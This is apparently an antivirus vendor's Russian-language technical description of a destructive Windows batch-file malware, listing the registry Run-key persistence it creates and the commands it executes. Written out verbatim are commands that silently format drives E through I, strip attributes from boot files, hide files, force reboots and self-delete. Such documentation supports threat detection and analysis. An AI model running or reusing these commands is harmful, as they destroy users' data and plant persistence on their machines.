Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] '$peer' = '%WINDIR%\TheBat.bat'
- %TEMP%\1.tmp\b2e.exe %TEMP%\1.tmp\b2e.exe <Текущая директория> <Полный путь к вирусу>
- <SYSTEM32>\format.com E:/g/y
- <SYSTEM32>\format.com F:/g/y
- <SYSTEM32>\attrib.exe -r -s -h C:\ntldr
- <SYSTEM32>\attrib.exe -r -s -h %WINDIR%\win.ini
- <SYSTEM32>\format.com g:/g/y
- <SYSTEM32>\shutdown.exe -r -t 10 -c "fdd"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\selfdel0.bat" "
- <SYSTEM32>\format.com H:/g/y
- <SYSTEM32>\format.com i:/g/ycd\
- <SYSTEM32>\label.exe hahhaha
- <SYSTEM32>\rundll32.exe shell32.dll,Activate_RunDLL
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\batfile.bat" "
- <SYSTEM32>\shutdown.exe -r -t 0 -c "MrUntraceable Is Awesome!"
- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run" /f /v "$peer" /t "REG_SZ" /d "%WINDIR%\TheBat.bat"
- <SYSTEM32>\attrib.exe -r -s -h c:\boot.ini
- <SYSTEM32>\wbem\wmiadap.exe /R /T
- <SYSTEM32>\attrib.exe +H "%WINDIR%\MyBat.bat"
- <SYSTEM32>\attrib.exe -r -s -h C:\autoexec.bat
- %TEMP%\selfdel0.bat
- %TEMP%\2.tmp\batfile.bat
- %TEMP%\1.tmp\b2e.exe
- %TEMP%\1.tmp\b2e.exe
- %TEMP%\2.tmp\batfile.bat
- %WINDIR%\win.ini